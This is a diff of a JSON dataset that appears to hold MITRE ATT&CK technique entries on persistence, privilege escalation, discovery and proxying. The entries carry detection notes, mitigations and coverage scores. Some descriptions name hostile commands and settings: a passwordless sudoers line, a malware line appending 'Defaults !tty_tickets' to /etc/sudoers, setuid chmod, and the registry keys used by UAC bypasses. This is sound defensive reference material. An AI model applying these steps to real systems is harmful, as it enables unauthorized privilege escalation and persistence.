-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.",
+        "detection": "Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.",
         "platforms": [
-            "IaaS",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Instance: Instance Metadata",
-            "Process: OS API Execution",
-            "Process: Process Creation"
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
         "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.6806753333333333,
-        "adjusted_score": 0.6806753333333333,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.13333333333333333,
-            "detection_score": 0.28
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.447342
+        "hardware_coverage": false
     },
     {
-        "tid": "T1083",
-        "name": "File and Directory Discovery",
-        "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).",
-        "url": "https://attack.mitre.org/techniques/T1083",
+        "tid": "T1547.015",
+        "name": "Boot or Logon Autostart Execution: Login Items",
+        "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)",
+        "url": "https://attack.mitre.org/techniques/T1547/015",
         "tactics": [
-            "Discovery"
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\n\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\n\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.",
         "platforms": [
-            "Linux",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution",
+            "File: File Creation",
+            "File: File Modification",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
         "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.3798930714285714,
-        "adjusted_score": 0.3798930714285714,
-        "has_car": false,
+        "cumulative_score": 0.5380952380952381,
+        "adjusted_score": 0.5380952380952381,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
@@ -4975,50 +27728,43 @@
         "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.07142857142857142,
-            "detection_score": 0.15
-        },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0.0584645
+        "hardware_coverage": false
     },
     {
-        "tid": "T1087",
-        "name": "Account Discovery",
-        "description": "Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.",
-        "url": "https://attack.mitre.org/techniques/T1087",
+        "tid": "T1548",
+        "name": "Abuse Elevation Control Mechanism",
+        "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.",
+        "url": "https://attack.mitre.org/techniques/T1548",
         "tactics": [
-            "Discovery"
+            "Defense Evasion",
+            "Privilege Escalation"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
+        "detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.",
         "platforms": [
-            "Azure AD",
-            "Google Workspace",
-            "IaaS",
             "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
+            "File: File Metadata",
+            "File: File Modification",
+            "Process: OS API Execution",
             "Process: Process Creation",
-            "User Account: User Account Metadata"
+            "Process: Process Metadata",
+            "Windows Registry: Windows Registry Key Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1087.001",
-                "name": "Account Discovery: Local Account",
-                "url": "https://attack.mitre.org/techniques/T1087/001",
-                "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
+                "tid": "T1548.001",
+                "name": "Abuse Elevation Control Mechanism: Setuid and Setgid",
+                "url": "https://attack.mitre.org/techniques/T1548/001",
+                "description": "An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).",
+                "detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.",
                 "mitigations": [
                     {
                         "mid": "M1028",
@@ -5029,74 +27775,160 @@
                 ]
             },
             {
-                "tid": "T1087.002",
-                "name": "Account Discovery: Domain Account",
-                "url": "https://attack.mitre.org/techniques/T1087/002",
-                "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
+                "tid": "T1548.002",
+                "name": "Abuse Elevation Control Mechanism: Bypass User Account Control",
+                "url": "https://attack.mitre.org/techniques/T1548/002",
+                "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
+                "detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    },
+                    {
+                        "mid": "M1052",
+                        "name": "User Account Control",
+                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                        "url": "https://attack.mitre.org/mitigations/M1052"
+                    }
+                ]
+            },
+            {
+                "tid": "T1548.003",
+                "name": "Abuse Elevation Control Mechanism: Sudo and Sudo Caching",
+                "url": "https://attack.mitre.org/techniques/T1548/003",
+                "description": "Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.",
+                "detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.",
                 "mitigations": [
                     {
                         "mid": "M1028",
                         "name": "Operating System Configuration",
                         "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
                         "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
                     }
                 ]
             },
             {
-                "tid": "T1087.003",
-                "name": "Account Discovery: Email Account",
-                "url": "https://attack.mitre.org/techniques/T1087/003",
-                "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-                "mitigations": []
-            },
-            {
-                "tid": "T1087.004",
-                "name": "Account Discovery: Cloud Account",
-                "url": "https://attack.mitre.org/techniques/T1087/004",
-                "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)",
-                "detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
+                "tid": "T1548.004",
+                "name": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt",
+                "url": "https://attack.mitre.org/techniques/T1548/004",
+                "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)",
+                "detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.",
+                "mitigations": [
                     {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
                     }
                 ]
             }
         ],
         "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
             {
                 "mid": "M1028",
                 "name": "Operating System Configuration",
                 "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
                 "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1052",
+                "name": "User Account Control",
+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
             }
         ],
-        "cumulative_score": 0.4758577114285714,
-        "adjusted_score": 0.4758577114285714,
+        "cumulative_score": 1.3063831233333334,
+        "adjusted_score": 1.3063831233333334,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
+            "2.5",
+            "3.3",
             "4.1",
-            "4.8",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
-            "SI-4"
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SC-18",
+            "SC-34",
+            "SI-12",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
@@ -5104,695 +27936,510 @@
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.2714285714285714,
-            "mitigation_score": 0.12727272727272726,
-            "detection_score": 0.43
+            "combined_score": 0.33333333333333337,
+            "mitigation_score": 0.5818181818181818,
+            "detection_score": 0.06
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.10442914
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.62304979
     },
     {
-        "tid": "T1090",
-        "name": "Proxy",
-        "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
-        "url": "https://attack.mitre.org/techniques/T1090",
+        "tid": "T1548.001",
+        "name": "Abuse Elevation Control Mechanism: Setuid and Setgid",
+        "description": "An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).",
+        "url": "https://attack.mitre.org/techniques/T1548/001",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion",
+            "Privilege Escalation"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).",
+        "detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.",
         "platforms": [
             "Linux",
-            "Network",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1090.001",
-                "name": "Proxy: Internal Proxy",
-                "url": "https://attack.mitre.org/techniques/T1090/001",
